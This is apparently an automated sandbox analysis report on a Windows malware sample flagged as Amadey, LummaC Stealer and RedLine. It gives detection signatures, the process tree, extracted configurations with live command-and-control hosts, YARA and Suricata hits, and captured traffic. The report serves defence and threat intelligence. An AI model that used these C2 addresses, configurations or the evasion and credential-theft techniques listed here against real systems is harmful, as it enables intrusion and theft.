Edit tour

Windows Analysis Report
Ryay9q4aDy.exe

Overview

General Information

Sample name:	Ryay9q4aDy.exe renamed because original name is a hash value
Original sample name:	59fb46de0b2d58a0a3e314e570d4707f.exe
Analysis ID:	1611329
MD5:	59fb46de0b2d58a0a3e314e570d4707f
SHA1:	0f507e62d761be7fc17666fbbb7cc555aa9c65ed
SHA256:	600a380c178cd94762e213c306b55cccdbfcc10b8be060386c0d2b4503ba1d9e
Tags:	exeuser-abuse_ch
Infos:

Detection

ScreenConnect Tool, Amadey, LummaC Stealer, RedLine

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Amadey

Yara detected Amadeys stealer DLL

Yara detected LummaC Stealer

Yara detected RedLine Stealer

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Joe Sandbox ML detected suspicious sample

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Uses known network protocols on non-standard ports

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks for available system drives (often done to infect USB drives)

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara detected ScreenConnect Tool

Yara signature match

Classification

Process Tree

System is w10x64

Ryay9q4aDy.exe (PID: 1336 cmdline: "C:\Users\user\Desktop\Ryay9q4aDy.exe" MD5: 59FB46DE0B2D58A0A3E314E570D4707F)

skotes.exe (PID: 4184 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 59FB46DE0B2D58A0A3E314E570D4707F)

skotes.exe (PID: 5936 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 59FB46DE0B2D58A0A3E314E570D4707F)

skotes.exe (PID: 1824 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 59FB46DE0B2D58A0A3E314E570D4707F)

loqVSeJ.exe (PID: 2848 cmdline: "C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe" MD5: F662CB18E04CC62863751B672570BD7D)

conhost.exe (PID: 3088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

7fOMOTQ.exe (PID: 972 cmdline: "C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe" MD5: B348884FC13A1A86E9E3A38A647CCD24)

5bzo1pz.exe (PID: 3272 cmdline: "C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe" MD5: F7E67090C4F1AF2850DF7B1159071431)

msiexec.exe (PID: 3276 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\setup.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 4276 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)

msiexec.exe (PID: 1672 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding BAA1802996B66BC4A9CFB5C0759B44F5 C MD5: 9D09DC1EDA745A5F87553048E57620CF)

rundll32.exe (PID: 6828 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI6AD3.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_7301968 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: 889B99C52A60DD49227C5E485A016679)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: LummaC

{"C2 url": ["rebeldettern.com", "importenptoc.com", "voicesharped.com", "inputrreparnt.com", "torpdidebar.com", "actiothreaz.com", "garulouscuto.com", "breedertremnd.com"], "Build id": "siVePy--"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Threatname: RedLine

{"C2 url": ["103.84.89.222:33791"], "Bot Id": "cheat"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\5bzo1pz[1].exe	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
0000000B.00000002.4375724429.00000000000D1000.00000040.00000001.01000000.0000000C.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000009.00000003.2643491766.0000000004B70000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000003.2643491766.0000000004B70000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000009.00000003.2643491766.0000000004B70000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x133ca:$a4: get_ScannedWallets 0x12228:$a5: get_ScanTelegram 0x1304e:$a6: get_ScanGeckoBrowsersPaths 0x10e6a:$a7: <Processes>k__BackingField 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1079e:$a9: <ScanFTP>k__BackingField
00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000002.00000002.2200330802.00000000005E1000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000E.00000002.4568824649.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
00000009.00000002.2997665741.0000000000372000.00000040.00000001.01000000.00000009.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.2997665741.0000000000372000.00000040.00000001.01000000.00000009.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000009.00000002.2997665741.0000000000372000.00000040.00000001.01000000.00000009.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x133ca:$a4: get_ScannedWallets 0x12228:$a5: get_ScanTelegram 0x1304e:$a6: get_ScanGeckoBrowsersPaths 0x10e6a:$a7: <Processes>k__BackingField 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1079e:$a9: <ScanFTP>k__BackingField
00000003.00000002.2209594785.00000000005E1000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000009.00000002.3001587383.0000000004F90000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000E.00000000.4542302807.0000000000B46000.00000002.00000001.01000000.0000000D.sdmp	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
Process Memory Space: loqVSeJ.exe PID: 2848	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: loqVSeJ.exe PID: 2848	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: loqVSeJ.exe PID: 2848	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x7ef00:$a4: get_ScannedWallets 0xdee160:$a4: get_ScannedWallets 0x7dda7:$a5: get_ScanTelegram 0xded007:$a5: get_ScanTelegram 0x7eb89:$a6: get_ScanGeckoBrowsersPaths 0xdedde9:$a6: get_ScanGeckoBrowsersPaths 0x7ca3a:$a7: <Processes>k__BackingField 0xdebc9a:$a7: <Processes>k__BackingField 0x79f6d:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xde91cd:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x7c36e:$a9: <ScanFTP>k__BackingField 0xdeb5ce:$a9: <ScanFTP>k__BackingField
Process Memory Space: 7fOMOTQ.exe PID: 972	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 7fOMOTQ.exe PID: 972	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 7fOMOTQ.exe PID: 972	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 5bzo1pz.exe PID: 3272	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security
Click to see the 16 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
9.2.loqVSeJ.exe.370000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.loqVSeJ.exe.370000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
9.2.loqVSeJ.exe.370000.0.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x137ca:$a4: get_ScannedWallets 0x12628:$a5: get_ScanTelegram 0x1344e:$a6: get_ScanGeckoBrowsersPaths 0x1126a:$a7: <Processes>k__BackingField 0xf17c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x10b9e:$a9: <ScanFTP>k__BackingField
9.2.loqVSeJ.exe.370000.0.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0x11bcb:$gen01: ChromeGetRoamingName 0x11bff:$gen02: ChromeGetLocalName 0x11c28:$gen03: get_UserDomainName 0x13e67:$gen04: get_encrypted_key 0x133e3:$gen05: browserPaths 0x1372b:$gen06: GetBrowsers 0x13061:$gen07: get_InstalledInputLanguages 0x1084f:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x8938:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x9318:$spe6: windows-1251, CommandLine: 0x145bd:$spe9: wallet 0xf00c:$typ01: 359A00EF6C789FD4C18644F56C5D3F97453FFF20 0xf107:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0 0xf464:$typ03: A937C899247696B6565665BE3BD09607F49A2042 0xf571:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2 0xf6f0:$typ05: 4E3D7F188A5F5102BEC5B820632BBAEC26839E63 0xf098:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60 0xf0c1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280 0xf25f:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301 0xf59a:$typ12: EB7EF1973CDC295B7B08FE6D82B9ECDAD1106AF2 0xf639:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
9.2.loqVSeJ.exe.370000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1068a:$u7: RunPE 0x13d41:$u8: DownloadAndEx 0x9330:$pat14: , CommandLine: 0x13279:$v2_1: ListOfProcesses 0x1088b:$v2_2: get_ScanVPN 0x1092e:$v2_2: get_ScanFTP 0x1161e:$v2_2: get_ScanDiscord 0x1260c:$v2_2: get_ScanSteam 0x12628:$v2_2: get_ScanTelegram 0x126ce:$v2_2: get_ScanScreen 0x13416:$v2_2: get_ScanChromeBrowsersPaths 0x1344e:$v2_2: get_ScanGeckoBrowsersPaths 0x13709:$v2_2: get_ScanBrowsers 0x137ca:$v2_2: get_ScannedWallets 0x137f0:$v2_2: get_ScanWallets 0x13810:$v2_3: GetArguments 0x11ed9:$v2_4: VerifyUpdate 0x167ea:$v2_4: VerifyUpdate 0x13bca:$v2_5: VerifyScanRequest 0x132c6:$v2_6: GetUpdates 0x167cb:$v2_6: GetUpdates
0.2.Ryay9q4aDy.exe.130000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
11.2.7fOMOTQ.exe.d0000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
3.2.skotes.exe.5e0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
14.2.5bzo1pz.exe.5ce0000.8.raw.unpack	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
2.2.skotes.exe.5e0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
14.0.5bzo1pz.exe.be6acc.5.raw.unpack	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
14.0.5bzo1pz.exe.b463d4.3.raw.unpack	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
14.0.5bzo1pz.exe.bc09d4.2.raw.unpack	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
14.0.5bzo1pz.exe.b30000.0.unpack	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
Click to see the 9 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-10T19:48:52.569443+0100	2028371	3	Unknown Traffic	192.168.2.6	50058	172.67.150.254	443	TCP
2025-02-10T19:48:53.277406+0100	2028371	3	Unknown Traffic	192.168.2.6	50059	172.67.150.254	443	TCP
2025-02-10T19:48:55.061205+0100	2028371	3	Unknown Traffic	192.168.2.6	50061	172.67.150.254	443	TCP
2025-02-10T19:48:56.901445+0100	2028371	3	Unknown Traffic	192.168.2.6	50062	172.67.150.254	443	TCP
2025-02-10T19:48:58.764580+0100	2028371	3	Unknown Traffic	192.168.2.6	50064	172.67.150.254	443	TCP
2025-02-10T19:49:00.667495+0100	2028371	3	Unknown Traffic	192.168.2.6	50066	172.67.150.254	443	TCP
2025-02-10T19:49:02.984479+0100	2028371	3	Unknown Traffic	192.168.2.6	50068	172.67.150.254	443	TCP
2025-02-10T19:49:05.540723+0100	2028371	3	Unknown Traffic	192.168.2.6	50070	172.67.150.254	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-10T19:48:52.763292+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50058	172.67.150.254	443	TCP
2025-02-10T19:48:53.788777+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50059	172.67.150.254	443	TCP
2025-02-10T19:49:06.025598+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50070	172.67.150.254	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-10T19:48:52.763292+0100	2049836	1	A Network Trojan was detected	192.168.2.6	50058	172.67.150.254	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-10T19:48:53.788777+0100	2049812	1	A Network Trojan was detected	192.168.2.6	50059	172.67.150.254	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-10T19:48:52.569443+0100	2059928	1	Domain Observed Used for C2 Detected	192.168.2.6	50058	172.67.150.254	443	TCP
2025-02-10T19:48:53.277406+0100	2059928	1	Domain Observed Used for C2 Detected	192.168.2.6	50059	172.67.150.254	443	TCP
2025-02-10T19:48:55.061205+0100	2059928	1	Domain Observed Used for C2 Detected	192.168.2.6	50061	172.67.150.254	443	TCP
2025-02-10T19:48:56.901445+0100	2059928	1	Domain Observed Used for C2 Detected	192.168.2.6	50062	172.67.150.254	443	TCP
2025-02-10T19:48:58.764580+0100	2059928	1	Domain Observed Used for C2 Detected	192.168.2.6	50064	172.67.150.254	443	TCP
2025-02-10T19:49:00.667495+0100	2059928	1	Domain Observed Used for C2 Detected	192.168.2.6	50066	172.67.150.254	443	TCP
2025-02-10T19:49:02.984479+0100	2059928	1	Domain Observed Used for C2 Detected	192.168.2.6	50068	172.67.150.254	443	TCP
2025-02-10T19:49:05.540723+0100	2059928	1	Domain Observed Used for C2 Detected	192.168.2.6	50070	172.67.150.254	443	TCP

ET MALWARE RedLine Stealer - CheckConnect Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-10T19:46:24.352837+0100	2045000	1	Malware Command and Control Activity Detected	103.84.89.222	33791	192.168.2.6	49986	TCP

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-10T19:46:14.135192+0100	2044696	1	A Network Trojan was detected	192.168.2.6	49982	185.215.113.43	80	TCP
2025-02-10T19:48:52.769567+0100	2044696	1	A Network Trojan was detected	192.168.2.6	50057	185.215.113.43	80	TCP
2025-02-10T19:49:25.748561+0100	2044696	1	A Network Trojan was detected	192.168.2.6	50078	185.215.113.43	80	TCP

ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-10T19:46:29.930745+0100	2045001	1	Malware Command and Control Activity Detected	103.84.89.222	33791	192.168.2.6	49986	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebeldettern .com)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-10T19:48:52.034704+0100	2059927	1	Domain Observed Used for C2 Detected	192.168.2.6	50754	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-10T19:48:55.724908+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.6	50061	172.67.150.254	443	TCP

ETPRO EXPLOIT Multiple Vendor Malformed ZIP Archive Antivirus Detection Bypass

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-10T19:49:18.847252+0100	2800029	1	Attempted User Privilege Gain	185.215.113.97	80	192.168.2.6	50077	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-10T19:46:06.360650+0100	2856147	1	A Network Trojan was detected	192.168.2.6	49932	185.215.113.43	80	TCP

ETPRO MALWARE Amadey CnC Response M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-10T19:46:13.390315+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.6	49947	TCP
2025-02-10T19:48:52.021385+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.6	50055	TCP
2025-02-10T19:49:24.976197+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.6	50076	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-10T19:46:09.396328+0100	2803305	3	Unknown Traffic	192.168.2.6	49953	185.215.113.97	80	TCP
2025-02-10T19:48:47.971265+0100	2803305	3	Unknown Traffic	192.168.2.6	50056	185.215.113.97	80	TCP
2025-02-10T19:49:18.404942+0100	2803305	3	Unknown Traffic	192.168.2.6	50077	185.215.113.97	80	TCP

ETPRO MALWARE RedLine - CheckConnect Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-10T19:46:18.762953+0100	2849662	1	Malware Command and Control Activity Detected	192.168.2.6	49986	103.84.89.222	33791	TCP

ETPRO MALWARE RedLine - EnvironmentSettings Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-10T19:46:24.794184+0100	2849351	1	Malware Command and Control Activity Detected	192.168.2.6	49986	103.84.89.222	33791	TCP

ETPRO MALWARE RedLine - GetUpdates Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-10T19:46:39.129588+0100	2848200	1	Malware Command and Control Activity Detected	192.168.2.6	50000	103.84.89.222	33791	TCP

ETPRO MALWARE RedLine - SetEnvironment Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-10T19:46:30.338320+0100	2849352	1	Malware Command and Control Activity Detected	192.168.2.6	49995	103.84.89.222	33791	TCP

Joe Security MALWARE RedLine - Initial C&C Contact - SOAP CheckConnect

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-10T19:46:18.762953+0100	1800000	1	Malware Command and Control Activity Detected	192.168.2.6	49986	103.84.89.222	33791	TCP

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: rebeldettern.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 10 Feb 2025 18:48:52 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d%2Fow0ZUgIR3Psohd1jNH4EFUeoKmHTb97lLFepb9ZrSH5uNV3eZHGSQCtxNcITSfNfXSy5OSMrpoP2xWIphaoQbADN3Ah0pJp5uYRQs%2BhW6NMzKB3v9HFa9ndaC2QF%2Bfr%2B%2Fm"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90fe46a1780678db-EWR

Source: loqVSeJ.exe, 00000009.00000002.3001587383.0000000004F41000.00000004.00000800.00020000.00000000.sdmp, loqVSeJ.exe, 00000009.00000002.3001587383.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp, loqVSeJ.exe, 00000009.00000002.3001587383.00000000053DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.84.89.222:33791
Source: loqVSeJ.exe, 00000009.00000002.3001587383.0000000004F41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.84.89.222:33791/
Source: loqVSeJ.exe, 00000009.00000002.3001587383.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.84.89.222:33791t-
Source: 5bzo1pz.exe, 0000000E.00000000.4542302807.0000000001021000.00000002.00000001.01000000.0000000D.sdmp, 5bzo1pz.exe, 0000000E.00000002.4568824649.0000000005F95000.00000004.08000000.00040000.00000000.sdmp, 5bzo1pz.exe.7.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: 7fOMOTQ.exe, 0000000B.00000003.4291121881.0000000005B74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: 7fOMOTQ.exe, 0000000B.00000003.4291121881.0000000005B74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: 5bzo1pz.exe, 0000000E.00000000.4542302807.0000000001021000.00000002.00000001.01000000.0000000D.sdmp, 5bzo1pz.exe, 0000000E.00000002.4568824649.0000000005F95000.00000004.08000000.00040000.00000000.sdmp, 5bzo1pz.exe.7.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: 5bzo1pz.exe, 0000000E.00000000.4542302807.0000000001021000.00000002.00000001.01000000.0000000D.sdmp, 5bzo1pz.exe, 0000000E.00000002.4568824649.0000000005F95000.00000004.08000000.00040000.00000000.sdmp, 5bzo1pz.exe.7.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: 5bzo1pz.exe, 0000000E.00000000.4542302807.0000000001021000.00000002.00000001.01000000.0000000D.sdmp, 5bzo1pz.exe, 0000000E.00000002.4568824649.0000000005F95000.00000004.08000000.00040000.00000000.sdmp, 5bzo1pz.exe.7.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: 7fOMOTQ.exe, 0000000B.00000003.4291121881.0000000005B74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: 5bzo1pz.exe, 0000000E.00000000.4542302807.0000000001021000.00000002.00000001.01000000.0000000D.sdmp, 5bzo1pz.exe, 0000000E.00000002.4568824649.0000000005F95000.00000004.08000000.00040000.00000000.sdmp, 5bzo1pz.exe.7.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: 7fOMOTQ.exe, 0000000B.00000003.4291121881.0000000005B74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: 7fOMOTQ.exe, 0000000B.00000003.4291121881.0000000005B74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
